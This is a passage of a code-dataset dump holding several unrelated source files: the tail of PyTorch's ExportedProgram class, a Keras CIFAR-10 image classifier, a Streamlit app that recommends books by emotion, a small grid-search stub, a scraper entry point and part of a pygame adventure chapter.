\"\"\"\n for buffer_name in self.graph_signature.buffers:\n yield buffer_name, self.state_dict[buffer_name]\n\n @property\n @compatibility(is_backward_compatible=False)\n def range_constraints(self):\n return self._range_constraints\n\n @property\n @compatibility(is_backward_compatible=False)\n def equality_constraints(self):\n return self._equality_constraints\n\n @property\n @compatibility(is_backward_compatible=False)\n def module_call_graph(self):\n return self._module_call_graph\n\n @property\n @compatibility(is_backward_compatible=False)\n def example_inputs(self):\n return self._example_inputs\n\n @property\n @compatibility(is_backward_compatible=False)\n def call_spec(self):\n from torch._export.exported_program import CallSpec\n\n if len(self.module_call_graph) == 0:\n return CallSpec(in_spec=None, out_spec=None)\n assert self.module_call_graph[0].fqn == \"\"\n return CallSpec(\n in_spec=self.module_call_graph[0].signature.in_spec,\n out_spec=self.module_call_graph[0].signature.out_spec,\n )\n\n @property\n @compatibility(is_backward_compatible=False)\n def 
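A hedged usage sketch of the lifted-state accessors defined above, assuming a recent PyTorch where torch.export.export is available:

import torch
from torch.export import export

ep = export(torch.nn.Linear(3, 2), (torch.randn(1, 3),))
for name, param in ep.named_parameters():
    print(name, tuple(param.shape))   # e.g. weight (2, 3), bias (2,)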
verifier(self) -> Any:\n return self._verifier\n\n @property\n @compatibility(is_backward_compatible=False)\n def dialect(self) -> str:\n return self._verifier.dialect\n\n def __call__(self, *args: Any, **kwargs: Any) -> Any:\n import torch._export.error as error\n from torch._export import combine_args_kwargs\n\n if self.call_spec.in_spec is not None:\n try:\n user_args = combine_args_kwargs(args, kwargs)\n args = fx_pytree.tree_flatten_spec(\n user_args, self.call_spec.in_spec, exact_structural_match=True\n ) # type: ignore[assignment]\n except Exception:\n _, received_spec = pytree.tree_flatten(user_args)\n raise TypeError( # noqa: TRY200\n \"Trying to flatten user inputs with exported input tree spec: \\n\"\n f\"{self.call_spec.in_spec}\\n\"\n \"but actually got inputs with tree spec of: \\n\"\n f\"{received_spec}\"\n )\n\n ordered_params = tuple(\n self.state_dict[name] for name in self.graph_signature.parameters\n )\n ordered_buffers = tuple(\n self.state_dict[name] for name in self.graph_signature.buffers\n )\n self._check_input_constraints(*ordered_params, *ordered_buffers, *args)\n\n # NOTE: calling convention is first params, then buffers, then args as user supplied them.\n # See: torch/_functorch/aot_autograd.py#L1034\n res = torch.fx.Interpreter(self.graph_module).run(\n *ordered_params, *ordered_buffers, *args, enable_io_processing=False\n )\n\n if self.call_spec.out_spec is not None:\n mutation = self.graph_signature.buffers_to_mutate\n num_mutated = len(mutation)\n mutated_buffers = res[:num_mutated]\n\n # Exclude dependency token from final result.\n assertion_dep_token = self.graph_signature.assertion_dep_token\n if assertion_dep_token is not None:\n assertion_dep_token_index = list(assertion_dep_token.keys())[0]\n res = res[:assertion_dep_token_index]\n\n res = res[num_mutated:]\n try:\n res = pytree.tree_unflatten(res, self.call_spec.out_spec)\n except Exception:\n _, received_spec = pytree.tree_flatten(res)\n raise error.InternalError( # noqa: TRY200\n \"Trying to flatten user outputs with exported output tree spec: \\n\"\n f\"{self.call_spec.out_spec}\\n\"\n \"but actually got outputs with tree spec of: \\n\"\n f\"{received_spec}\"\n )\n finally:\n ix = 0\n for buffer in self.graph_signature.buffers_to_mutate.values():\n self.state_dict[buffer] = mutated_buffers[ix]\n ix += 1\n return res\n\n def __str__(self) -> str:\n graph_module = self.graph_module.print_readable(print_output=False).replace(\n \"\\n\", \"\\n \"\n )\n string = (\n \"ExportedProgram:\\n\"\n f\" {graph_module}\\n\"\n f\"Graph signature: {self.graph_signature}\\n\"\n f\"Range constraints: {self.range_constraints}\\n\"\n f\"Equality constraints: {self.equality_constraints}\\n\"\n )\n return string\n\n def module(self, *, flat: bool = True) -> torch.nn.Module:\n \"\"\"\n Returns a self contained GraphModule with all the parameters/buffers inlined.\n \"\"\"\n from torch._export.exported_program import unlift_exported_program_lifted_states\n from torch._export.unflatten import unflatten\n\n if flat:\n return unlift_exported_program_lifted_states(self)\n else:\n return unflatten(self)\n\n def run_decompositions(\n self, decomp_table: Optional[Dict[torch._ops.OperatorBase, Callable]] = None\n ) -> \"ExportedProgram\":\n \"\"\"\n Run a set of decompositions on the exported program and returns a new\n exported program. 
By default we will run the Core ATen decompositions to\n get operators in the\n `Core ATen Operator Set `_.\n\n For now, we do not decompose joint graphs.\n \"\"\"\n from torch._decomp import core_aten_decompositions\n from torch._export.passes.add_runtime_assertions_for_constraints_pass import (\n _AddRuntimeAssertionsForInlineConstraintsPass,\n InputDim,\n )\n from torch._export.passes.lift_constant_tensor_pass import (\n lift_constant_tensor_pass,\n )\n from torch._export.passes.replace_sym_size_ops_pass import (\n _replace_sym_size_ops_pass,\n )\n from torch._functorch.aot_autograd import aot_export_module\n\n def _get_placeholders(gm):\n placeholders = []\n for node in gm.graph.nodes:\n if node.op != \"placeholder\":\n break\n placeholders.append(node)\n return placeholders\n\n decomp_table = decomp_table or core_aten_decompositions()\n\n old_placeholders = _get_placeholders(self.graph_module)\n fake_args = [node.meta[\"val\"] for node in old_placeholders]\n\n buffers_to_remove = [name for name, _ in self.graph_module.named_buffers()]\n for name in buffers_to_remove:\n delattr(self.graph_module, name)\n # TODO(zhxhchen17) Return the new graph_signature directly.\n gm, graph_signature = aot_export_module(\n self.graph_module, fake_args, decompositions=decomp_table, trace_joint=False\n )\n\n # Update the signatures with the new placeholder names in case they\n # changed when calling aot_export\n new_placeholders = _get_placeholders(gm)\n assert len(new_placeholders) == len(old_placeholders)\n old_new_placeholder_map = {\n old_node.name: new_node.name\n for old_node, new_node in zip(old_placeholders, new_placeholders)\n }\n old_outputs = list(self.graph.nodes)[-1].args[0]\n new_outputs = list(gm.graph.nodes)[-1].args[0]\n assert len(new_outputs) == len(old_outputs)\n old_new_output_map = {\n old_node.name: new_node.name\n for old_node, new_node in zip(old_outputs, new_outputs)\n }\n\n def make_argument_spec(old_node, node) -> ArgumentSpec:\n if \"val\" not in node.meta:\n assert len(node.users) == 0\n val = old_node.meta[\"val\"]\n else:\n val = node.meta[\"val\"]\n if isinstance(val, torch.Tensor):\n return TensorArgument(name=node.name)\n elif isinstance(val, torch.SymInt):\n return SymIntArgument(name=node.name)\n else:\n return ConstantArgument(value=val)\n\n input_specs, output_specs = _sig_to_specs(\n user_inputs={\n old_new_placeholder_map[inp] for inp in self.graph_signature.user_inputs\n },\n inputs_to_parameters={\n old_new_placeholder_map[inp]: param\n for inp, param in self.graph_signature.inputs_to_parameters.items()\n },\n inputs_to_buffers={\n old_new_placeholder_map[inp]: buffer\n for inp, buffer in self.graph_signature.inputs_to_buffers.items()\n },\n user_outputs={\n old_new_output_map[out] for out in self.graph_signature.user_outputs\n },\n buffer_mutations={\n old_new_output_map[out]: buffer\n for out, buffer in self.graph_signature.buffers_to_mutate.items()\n },\n grad_params={},\n grad_user_inputs={},\n loss_output=None,\n inputs=[\n make_argument_spec(old_placeholders[i], node)\n for i, node in enumerate(gm.graph.nodes)\n if node.op == \"placeholder\"\n ],\n outputs=[\n make_argument_spec(old_outputs[i], node)\n for i, node in enumerate(\n pytree.tree_leaves(next(iter(reversed(gm.graph.nodes))).args)\n )\n ],\n )\n\n new_graph_signature = ExportGraphSignature(\n input_specs=input_specs, output_specs=output_specs\n )\n # NOTE: aot_export adds symint metadata for placeholders with int\n # values; since these become specialized, we replace such metadata with\n # the 
original values.\n # Also, set the param/buffer metadata back to the placeholders.\n for old_node, new_node in zip(old_placeholders, new_placeholders):\n if not isinstance(old_node.meta[\"val\"], torch.Tensor):\n new_node.meta[\"val\"] = old_node.meta[\"val\"]\n\n if (\n new_node.target in new_graph_signature.inputs_to_parameters\n or new_node.target in new_graph_signature.inputs_to_buffers\n ):\n for k, v in old_node.meta.items():\n new_node.meta[k] = v\n\n # TODO unfortunately preserving graph-level metadata is not\n # working well with aot_export. So we manually copy it.\n # (The node-level meta is addressed above.)\n gm.meta.update(self.graph_module.meta)\n\n new_range_constraints = _get_updated_range_constraints(gm)\n\n new_equality_constraints = [\n (\n InputDim(old_new_placeholder_map[inp_dim1.input_name], inp_dim1.dim),\n InputDim(old_new_placeholder_map[inp_dim2.input_name], inp_dim2.dim),\n )\n for inp_dim1, inp_dim2 in self.equality_constraints\n ]\n\n state_dict = self.state_dict.copy()\n lift_constant_tensor_pass(gm, new_graph_signature, state_dict)\n _replace_sym_size_ops_pass(gm)\n exported_program = ExportedProgram(\n gm,\n gm.graph,\n new_graph_signature,\n state_dict,\n new_range_constraints,\n new_equality_constraints,\n copy.deepcopy(self.module_call_graph),\n self.example_inputs,\n self.verifier,\n )\n\n if len(new_range_constraints) > 0 or len(new_equality_constraints) > 0:\n exported_program = exported_program._transform(\n _AddRuntimeAssertionsForInlineConstraintsPass(\n new_range_constraints, new_equality_constraints\n )\n )\n\n return exported_program\n\n def _transform(self, *passes: PassType) -> \"ExportedProgram\":\n pm = PassManager(list(passes))\n res = pm(self.graph_module)\n transformed_gm = res.graph_module if res is not None else self.graph_module\n assert transformed_gm is not None\n\n if transformed_gm is self.graph_module and not res.modified:\n return self\n\n # TODO(zhxchen17) Remove this.\n def _get_updated_graph_signature(\n old_signature: ExportGraphSignature,\n new_gm: torch.fx.GraphModule,\n ) -> ExportGraphSignature:\n \"\"\"\n Update the graph signature's user_input/user_outputs.\n \"\"\"\n new_graph_inputs = [\n node.name for node in new_gm.graph.nodes if node.op == \"placeholder\"\n ]\n num_inputs = (\n len(old_signature.parameters)\n + len(old_signature.buffers)\n + len(\n [\n s\n for s in old_signature.input_specs\n if s.kind == InputKind.USER_INPUT\n ]\n )\n )\n\n assert len(new_graph_inputs) == num_inputs, (\n f\"Number of input nodes changed from {len(new_graph_inputs)} \"\n f\"to {num_inputs} after transformation. This transformation \"\n \"is currently not supported.\"\n )\n num_param_buffers = len(old_signature.buffers) + len(\n old_signature.parameters\n )\n new_user_inputs = new_graph_inputs[num_param_buffers:]\n\n output_node = list(new_gm.graph.nodes)[-1]\n assert output_node.op == \"output\"\n new_graph_outputs = [arg.name for arg in output_node.args[0]]\n\n assert len(new_graph_outputs) == len(old_signature.buffers_to_mutate) + len(\n [\n s\n for s in old_signature.output_specs\n if s.kind == OutputKind.USER_OUTPUT\n ]\n ), (\n f\"Number of output nodes changed from {len(new_graph_outputs)} \"\n f\"to {len(old_signature.buffers_to_mutate) + len(old_signature.user_outputs)} \"\n \"after transformation. 
This transformation is currently not supported.\"\n )\n new_user_outputs = new_graph_outputs[len(old_signature.buffers_to_mutate) :]\n\n def make_argument_spec(node) -> ArgumentSpec:\n val = node.meta[\"val\"]\n if isinstance(val, torch.Tensor):\n return TensorArgument(name=node.name)\n elif isinstance(val, torch.SymInt):\n return SymIntArgument(name=node.name)\n else:\n return ConstantArgument(value=val)\n\n input_specs, output_specs = _sig_to_specs(\n user_inputs=set(new_user_inputs),\n inputs_to_parameters=old_signature.inputs_to_parameters,\n inputs_to_buffers=old_signature.inputs_to_buffers,\n user_outputs=set(new_user_outputs),\n buffer_mutations=old_signature.buffers_to_mutate,\n grad_params={},\n grad_user_inputs={},\n loss_output=None,\n inputs=[\n make_argument_spec(node)\n for node in transformed_gm.graph.nodes\n if node.op == \"placeholder\"\n ],\n outputs=[\n make_argument_spec(node)\n for node in pytree.tree_flatten(\n next(iter(reversed(transformed_gm.graph.nodes))).args\n )[0]\n ],\n )\n new_signature = ExportGraphSignature(\n input_specs=input_specs, output_specs=output_specs\n )\n return new_signature\n\n transformed_ep = ExportedProgram(\n transformed_gm,\n transformed_gm.graph,\n _get_updated_graph_signature(self.graph_signature, transformed_gm),\n self.state_dict,\n _get_updated_range_constraints(transformed_gm),\n copy.deepcopy(self.equality_constraints),\n copy.deepcopy(self._module_call_graph),\n self.example_inputs,\n self.verifier,\n )\n transformed_ep.graph_module.meta.update(self.graph_module.meta)\n transformed_ep.graph_module.meta.update(res.graph_module.meta)\n return transformed_ep\n\n def _check_input_constraints(self, *args):\n from torch._export.passes.add_runtime_assertions_for_constraints_pass import (\n _AddRuntimeAssertionsForConstraintsPass,\n )\n\n # TODO(zhxchen17) Don't generate a runtime graph on the fly.\n _assertion_graph = torch.fx.GraphModule({}, torch.fx.Graph())\n for p in self.graph.nodes:\n if p.op != \"placeholder\":\n continue\n new_p = _assertion_graph.graph.placeholder(p.name)\n new_p.meta = p.meta\n _assertion_graph.graph.output(())\n _assertion_graph_res = _AddRuntimeAssertionsForConstraintsPass(\n self.range_constraints,\n self.equality_constraints,\n )(_assertion_graph)\n assert _assertion_graph_res is not None\n _assertion_graph = _assertion_graph_res.graph_module\n _assertion_graph(*args)\n\n def _validate(self):\n self.verifier().check(self)\n\n\ndef _get_updated_range_constraints(\n gm: torch.fx.GraphModule,\n) -> \"Dict[sympy.Symbol, Any]\":\n def get_shape_env(gm):\n vals = [\n node.meta[\"val\"]\n for node in gm.graph.nodes\n if node.meta.get(\"val\", None) is not None\n ]\n from torch._guards import detect_fake_mode\n\n fake_mode = detect_fake_mode(vals)\n if fake_mode is not None:\n return fake_mode.shape_env\n for v in vals:\n if isinstance(v, torch.SymInt):\n return v.node.shape_env\n\n shape_env = get_shape_env(gm)\n if shape_env is None:\n return {}\n range_constraints = {\n k: v\n for k, v in shape_env.var_to_range.items()\n if k not in shape_env.replacements\n }\n return range_constraints\n","repo_name":"pytorch/pytorch","sub_path":"torch/export/exported_program.py","file_name":"exported_program.py","file_ext":"py","file_size_in_byte":23934,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"17323174106","text":"from keras.datasets import cifar10\r\nimport matplotlib.pyplot as plt\r\nfrom keras.models import Sequential, load_model\r\nfrom keras import 
layers\r\nfrom tensorflow.keras.optimizers import SGD\r\nfrom keras.utils import np_utils \r\nfrom keras.constraints import maxnorm\r\nimport random\r\nimport numpy as np\r\n\r\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\r\n\r\nclasses=['Aeroplane','Automobile','Bird','Cat','Deer','Dog','Frog','Horse','Ship','Truck']\r\n\r\nprint('Train samples count:', X_train.shape[0])\r\nprint('Test samples count:', X_test.shape[0])\r\n\r\nX_train=X_train.astype('float32')\r\nX_test=X_test.astype('float32')\r\n \r\nX_train=X_train/255.0 # normalize image pixel values from 0..255 to 0..1\r\nX_test=X_test/255.0\r\n\r\nY_train = np_utils.to_categorical(y_train,10) # One-hot encoding, e.g. 6 -> [0 0 0 0 0 1 0 0 0 0]\r\nY_test = np_utils.to_categorical(y_test,10)\r\n\r\nopt = SGD(lr=0.001, momentum=0.9)\r\n\r\nmodel = Sequential()\r\n\r\nmodel.add(layers.Conv2D(32, (3,3), padding='same', activation='relu', input_shape=(32,32,3), kernel_constraint=maxnorm(3)))\r\nmodel.add(layers.BatchNormalization())\r\nmodel.add(layers.Conv2D(32, (3,3), padding='same', activation='relu', kernel_constraint=maxnorm(3)))\r\nmodel.add(layers.BatchNormalization())\r\nmodel.add(layers.MaxPooling2D(pool_size=(2,2)))\r\nmodel.add(layers.Dropout(0.3))\r\n\r\nmodel.add(layers.Conv2D(64, (3,3), padding='same', activation='relu'))\r\nmodel.add(layers.BatchNormalization())\r\nmodel.add(layers.Conv2D(64, (3,3), padding='same', activation='relu'))\r\nmodel.add(layers.BatchNormalization())\r\nmodel.add(layers.MaxPooling2D(pool_size=(2,2)))\r\nmodel.add(layers.Dropout(0.5))\r\n\r\nmodel.add(layers.Flatten())\r\nmodel.add(layers.Dense(64, activation='relu'))\r\nmodel.add(layers.BatchNormalization())\r\nmodel.add(layers.Dropout(0.5))\r\nmodel.add(layers.Dense(10, activation='softmax', kernel_constraint=maxnorm(3)))\r\nmodel.summary()\r\n\r\nmodel.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\r\n\r\n#model.fit(X_train,Y_train,validation_data=(X_test,Y_test),epochs=10,batch_size=32)\r\n#model.save('my_model.h5')\r\n\r\n\r\nmodel1 = load_model(\"my_model.h5\")\r\nloss,acc=model1.evaluate(X_test,Y_test)\r\n\r\nprint(\"Model Accuracy : \"+str(acc*100))\r\nprint(\"Model Loss : \"+str(loss))\r\n\r\nresult = model1.predict(X_test)\r\nresult_list_index = np.argmax(result, axis=1)\r\n\r\nfig, axes = plt.subplots(4, 4, figsize=(10,10))\r\naxes = axes.ravel()\r\nrandom_int = random.randint(0, 9983)\r\nindex = 0\r\nfor i in range(random_int, random_int + 16):\r\n axes[index].imshow(X_test[i])\r\n axes[index].set_title(\"True Class:\" + str(classes[np.argmax(Y_test[i])]) + \" \\nPredict Class:\" + str(classes[result_list_index[i]])) \r\n axes[index].axis('off')\r\n plt.subplots_adjust(left=0.1,bottom=0.1,right=0.9, top=0.9, wspace=0.5, hspace=0.4)\r\n index +=1\r\n \r\n \r\n\r\n","repo_name":"ozanhasas/Image-Classification","sub_path":"CIDL.py","file_name":"CIDL.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"6211984029","text":"\nimport streamlit as st\nfrom streamlit_lottie import st_lottie\nimport requests\nimport time \nimport json\nimport urllib\nimport os\n\n# Function for loading animation\ndef load_lottieurl(url):\n r = requests.get(url)\n if r.status_code != 200:\n return None\n return r.json()\n\n# Function for querying Hugging Face models\ndef query_with_retry(payload, API_URL, headers, max_retries=3, delay=15):\n for _ in range(max_retries):\n response = requests.post(API_URL, headers=headers, 
json=payload)\n \n if response.status_code == 200: # If successful\n return response.json()\n else:\n st.warning(f\"Waiting for the model's response from HuggingFace API. Retrying in {delay} seconds...\")\n time.sleep(delay)\n st.error(\"Apologies. It seems that HuggingFace APIs are currently overloaded\")\n\n# Function to fetch book details using Google Books API\ndef fetch_book_info(title):\n title = urllib.parse.quote(title) # URL encode the book title\n Goog_API_Key = os.environ['Goog_API_Key']\n response = urllib.request.urlopen(f'https://www.googleapis.com/books/v1/volumes?q={title}&key={Goog_API_Key}')\n data = json.load(response)\n info = data['items'][0]['volumeInfo'] # Get info of the first matched book\n return info['title'], info['imageLinks']['thumbnail'], info['previewLink']\n\n# Function for classifying and generating recommendations\ndef classify_and_recommend(text):\n progress_bar = st.progress(0)\n Hugg_API_Key = os.environ['Hugg_API_Key']\n headers = {\"Authorization\": f\"Bearer {Hugg_API_Key}\"}\n \n # Emotion Classification\n progress_bar.text(\"Classifying emotion...\")\n API_URL = \"https://api-inference.huggingface.co/models/SamLowe/roberta-base-go_emotions\"\n\n output_1 = query_with_retry({\"inputs\": text,}, API_URL, headers)\n emotion = output_1[0][0].get('label')\n progress_bar.progress(50)\n\n supported_emotions = [\"fear\", \"sadness\"]\n if emotion not in supported_emotions:\n st.error(f\"The emotion {emotion} is not currently supported. Please try with a different text.\")\n else:\n\n # Ailment Classification\n progress_bar.text(\"Predicting ailment...\")\n API_URL = \"https://api-inference.huggingface.co/models/facebook/bart-large-mnli\"\n \n if emotion == 'fear':\n candidate_labels = ['fear of death', 'fear of flying']\n elif emotion == 'sadness':\n candidate_labels = ['depression', 'grief']\n\n output_2 = query_with_retry({\n \"inputs\": text,\n \"parameters\": {\"candidate_labels\": candidate_labels},\n }, API_URL, headers)\n ailment = output_2.get('labels')[0]\n progress_bar.progress(100)\n time.sleep(1)\n progress_bar.empty()\n\n # Books recommended by The Novel Cure\n if ailment == 'fear of death':\n book_list = ['White Noise', 'Hundred Years of Solitude']\n elif ailment == 'fear of flying':\n book_list = [\"Night Flight\", \"The Count of Monte Cristo\", \"The Magus\", \"In the Woods\", \"Carter Beats the Devil\"]\n elif ailment == 'depression':\n book_list = ['The Unbearable Lightness of Being', 'The Bell Jar', 'Mr. Chartwell', 'The Marriage Plot']\n elif ailment == 'grief':\n book_list = [\"After You'd Gone\", 'Incendiary', 'Extremely Loud & Incredibly Close', 'What I Loved']\n\n\n # Fetch book info from Google Books API (you can replace this part with a static list if needed)\n progress_bar.text(\"Fetching book information...\")\n book_info_list = []\n for book in book_list:\n title, image, url = fetch_book_info(book)\n book_info_list.append((title, image, url))\n progress_bar.progress(100)\n time.sleep(1)\n progress_bar.empty()\n\n return emotion, ailment, book_info_list\n\n# Load Animation\nlottie_anim = load_lottieurl(\"https://lottie.host/fa433011-9a30-4fcc-a03e-a7c9c76a917b/feBor8W1MA.json\")\n\n# Page Configuration\nst.set_page_config(page_title=\"Pneuma\", page_icon=\"📕\", layout=\"wide\")\nheader_text = \"Pneuma\"\nst.markdown(f\"

    {header_text}

    \", unsafe_allow_html=True)\nst.markdown(\"##### Befriend a Book.. And You Will Never Walk Alone\")\n\n# Entry Box & Animation\nwith st.container():\n col1, col2 = st.columns([1, 1])\n with col1:\n with st.form('my_form'):\n text = st.text_area('Enter tweets here:', 'The world keeps spinning, indifferent to my loss. The sun still rises, the birds still sing, but the joy in these simple miracles of life seems to have faded.')\n submitted = st.form_submit_button('Get Books')\n if submitted: \n emotion, ailment, book_info_list = classify_and_recommend(text)\n\n with col2:\n st_lottie(lottie_anim, height=300, key=\"coding\")\n\n# Display Model Results\nif submitted:\n st.markdown(\"### Predominant Emotion:\")\n st.markdown(emotion)\n st.markdown(\"### Predicted Ailment:\")\n st.markdown(ailment)\n # Display Recommended Books\n st.markdown(\"

    Recommended Books

    \", unsafe_allow_html=True)\n st.markdown(\"
    \", unsafe_allow_html=True) # Add an empty line\n st.markdown(\"
    \", unsafe_allow_html=True) # Add an empty line\n cols = st.columns(len(book_info_list)) # Create as many columns as there are books\n for i, info in enumerate(book_info_list):\n cols[i].markdown(f'', unsafe_allow_html=True)\n cols[i].markdown(f\"
    {info[0]}
    \", unsafe_allow_html=True)\n\nst.markdown(\"---\") # Optional horizontal line for separation\nst.markdown(\"Developed by **Abdullah Garatli**\")\n","repo_name":"garatli/pneuma","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27585295550","text":"import numpy as np\nimport pandas as pd\n\n\n\nclass gridsearch:\n def __init__(self, est, params, cv):\n\n # define parameter search grid\n param_values = []\n for key in params.keys():\n param_values.append(params[key])\n\n self.params = np.array(np.meshgrid(a,b,c)).T.reshape(-1,3)\n","repo_name":"jahanpd/ML-for-Predicting-Cardiac-Surgery-Associated-AKI","sub_path":"auxillary/gridsearch.py","file_name":"gridsearch.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22861784669","text":"from scraper import scrape\nfrom sys import argv, exit\n\n\ndef main():\n if len(argv) < 2:\n print(\"Error: expected URL\")\n exit(1)\n targetUrl = argv[1]\n\n print(scrape(targetUrl))\n\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Zakini/Sainsburys-Web-Scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2779396080","text":"import pygame\nfrom sources import default,tools,setup\nfrom states import roles,goods,load_js,npc,chat_board,items_interation\n\n\n\n\nclass Cpt3 :\n def __init__(self):\n self.state_name = 'cpt3'\n self.finish = False\n self.next = 'cpt4'\n self.cpt3_background()\n self.setup_role()\n self.setup_npc()\n\n self.judge = False\n self.num_mes = 0\n self.mes_trigger = False\n self.mage_judge = False\n self.code2 = False\n self.letter_judge = False\n self.rope_judge = False\n self.monument_judge = False\n self.sword_judge = False\n self.sword =False\n self.teleport_judge = False\n self.teleport = False\n self.speak = False\n self.end = False\n self.chat_npc = 0\n self.chat_sound = pygame.mixer.Sound('./data/sounds/chat.mp3')\n\n\n self.cpt3_map = load_js.load_map('./states/chapter3.json') # [{\"x\": 293, \"y\": 379, \"width\": 211, \"height\": 43}]\n tools.trans_pixis(self.cpt3_map, default.CPT1_PIXIS_X, default.CPT1_PIXIS_Y)\n self.setup_goods()\n self.setup_item()\n\n def setup_goods(self):\n '''\n set up all the group of sprite\n :return:\n '''\n self.cpt3_group = pygame.sprite.Group()\n for item in self.cpt3_map :\n self.cpt3_group.add(goods.Goods(item['x'],item['y'],item['width'],item['height']))\n print(self.cpt3_group)\n\n def cpt3_background(self):\n self.image = pygame.image.load('./data/map/chapter_3.png')\n self.image = pygame.transform.scale(self.image, (default.SCREEN_WIDTH, default.SCREEN_HEIGHT))\n\n\n def setup_role(self):\n '''\n set up the hero in the chapter_3\n :return:\n '''\n self.role = roles.Role(default.HUMAN_PICTURE[2])\n self.role.current_structure = self.role.stop_structure\n self.role.rect.x = 539\n self.role.rect.y = 569\n\n def setup_npc(self):\n\n self.mage = npc.NPC(\"Bard——Yang Yu\",default.info[4],default.HUMAN_PICTURE[3])\n self.chat = chat_board.Chat()\n self.mage.rect.x = 985\n self.mage.rect.y = 435\n self.sword_img = pygame.image.load('./data/item/sword.png')\n\n self.chat_npc_list = [self.mage]\n self.chat_npc_list.append(items_interation.Item('monument1'))\n 
self.chat_npc_list.append(items_interation.Item('monument2'))\n self.chat_npc_list.append(items_interation.Item('Letter3'))\n self.chat_npc_list.append(items_interation.Item('row'))\n self.chat_npc_list.append(items_interation.Item('statue'))\n self.chat_npc_list.append(items_interation.Item('teleportation1'))\n self.chat_npc_list.append(items_interation.Item('teleportation2'))\n #[ 0mage , 1monument1 , 2monument2 , 3letter , 4rope , 5sword , 6teleport1 , 7teleport2]\n\n def setup_item(self):\n pass\n\n def find_talk(self,keys):\n '''\n judge which item or npc need to interact with hero\n :param keys:\n :return:\n '''\n # mage judge\n if(self.role.rect.x > 900 and self.role.rect.x <918) and (self.role.rect.y > 420 and self.role.rect.y < 447):\n if keys[pygame.K_a]:\n self.judge = True\n default.chat_sound_start = True\n self.mage_judge = True\n # rope judge\n if (self.role.rect.x > 525 and self.role.rect.x < 555) and (self.role.rect.y > 122 and self.role.rect.y < 137):\n if keys[pygame.K_a]:\n self.judge = True\n default.chat_sound_start = True\n self.rope_judge =True\n #sword judge\n if (self.role.rect.x > 130 and self.role.rect.x < 160) and (self.role.rect.y > 148 and self.role.rect.y < 180):\n if keys[pygame.K_a]:\n if self.sword ==True:\n self.judge = True\n default.chat_sound_start = True\n self.sword_judge = True\n #letter judge\n if (self.role.rect.x > 575 and self.role.rect.x < 600) and (self.role.rect.y > 537 and self.role.rect.y < 570):\n if keys[pygame.K_a]:\n self.judge = True\n default.chat_sound_start = True\n self.letter_judge =True\n #monument judge\n if (self.role.rect.x > 655 and self.role.rect.x < 700) and (self.role.rect.y > 368 and self.role.rect.y < 381):\n if keys[pygame.K_a]:\n self.judge = True\n default.chat_sound_start = True\n self.monument_judge =True\n #teleport judge\n if (self.role.rect.x > 813 and self.role.rect.x < 875) and (self.role.rect.y > 135 and self.role.rect.y < 221):\n if keys[pygame.K_a]:\n self.judge = True\n default.chat_sound_start = True\n self.teleport_judge = True\n\n def draw_items(self,judge,surface,keys):\n if self.sword:\n if default.HERO_ITEM['sword'] != 1:\n surface.blit(self.sword_img, (129, 135))\n else:\n pass\n if judge:\n\n #mage\n if self.mage_judge:\n self.mage_judge = False\n self.chat_npc = self.chat_npc_list[0]\n self.code2 = True\n self.speak = True\n #monument\n if self.monument_judge:\n self.monument_judge = False\n if self.code2 == False:\n self.chat_npc = self.chat_npc_list[1]\n self.speak = True\n else:\n self.chat_npc = self.chat_npc_list[2]\n self.speak = True\n self.teleport = True\n #letter\n if self.letter_judge:\n surface.blit(default.ITEM_LIST[3], (100, 75))\n if keys[pygame.K_SPACE]:\n self.letter_judge = False\n self.chat_npc = self.chat_npc_list[3]\n self.speak = True\n #rope\n if self.rope_judge:\n self.rope_judge = False\n self.chat_npc =self.chat_npc_list[4]\n self.speak = True\n if default.HERO_ITEM[\"sword\"] ==0:\n self.sword = True\n #sword\n if self.sword_judge:\n self.sword_judge =False\n default.HERO_ITEM[\"sword\"] = 1\n self.chat_npc = self.chat_npc_list[5]\n self.speak = True\n self.sword = False\n #teleport\n if self.teleport_judge:\n self.teleport_judge = False\n if self.teleport == False:\n self.chat_npc = self.chat_npc_list[6]\n self.speak = True\n else :\n self.chat_npc = self.chat_npc_list[7]\n self.speak = True\n # [ 0mage , 1monument1 , 2monument2 , 3letter , 4rope , 5sword , 6teleport1 , 7teleport2]\n if self.speak:\n for key,value in self.chat_npc.chat_mes[self.num_mes].items():\n if 
key == 'Warrior':\n default.CHAT_START_Y = 670\n self.chat.print_mes(self.chat_npc.chat_mes[self.num_mes][key],surface)\n default.CHAT_START_Y = 570\n if self.chat_npc.attri == 'npc':\n surface.blit(self.chat_npc.npc_pit,(default.HUMAN_PICT_WIDTH,default.HUMAN_PICT_HEIGHT))\n surface.blit(self.role.hero_pit,(default.HERO_PICT_WIDTH,default.HERO_PICT_HEIGHT))\n\n if len(self.chat_npc.chat_mes) == (self.num_mes +1):\n if self.teleport:\n if(self.role.rect.x > 813 and self.role.rect.x < 875) and (self.role.rect.y > 135 and self.role.rect.y < 221):\n if keys[pygame.K_SPACE]:\n self.num_mes = 0\n self.judge = False\n self.mes_trigger = False\n self.mage_judge = False\n self.speak = False\n self.finish = True\n return\n if keys[pygame.K_SPACE]:\n self.num_mes = 0\n self.judge = False\n self.mes_trigger = False\n self.mage_judge = False\n self.speak = False\n return\n if len(self.chat_npc.chat_mes) > (self.num_mes):\n if keys[pygame.K_SPACE]:\n self.mes_trigger = True\n if keys[pygame.K_SPACE] == False and self.mes_trigger == True:\n self.num_mes += 1\n self.mes_trigger = False\n\n\n def update_position(self):\n\n self.role.rect.x += self.role.x_vel\n self.x_collide()\n self.role.rect.y += self.role.y_vel\n\n self.y_collide()\n # y=730\n\n\n\n print(self.role.rect)\n\n def x_collide(self):\n '''\n judge whether there is collision in the x_axis. if yes, do something\n :return:\n '''\n self.goods_collision = pygame.sprite.spritecollideany(self.role, 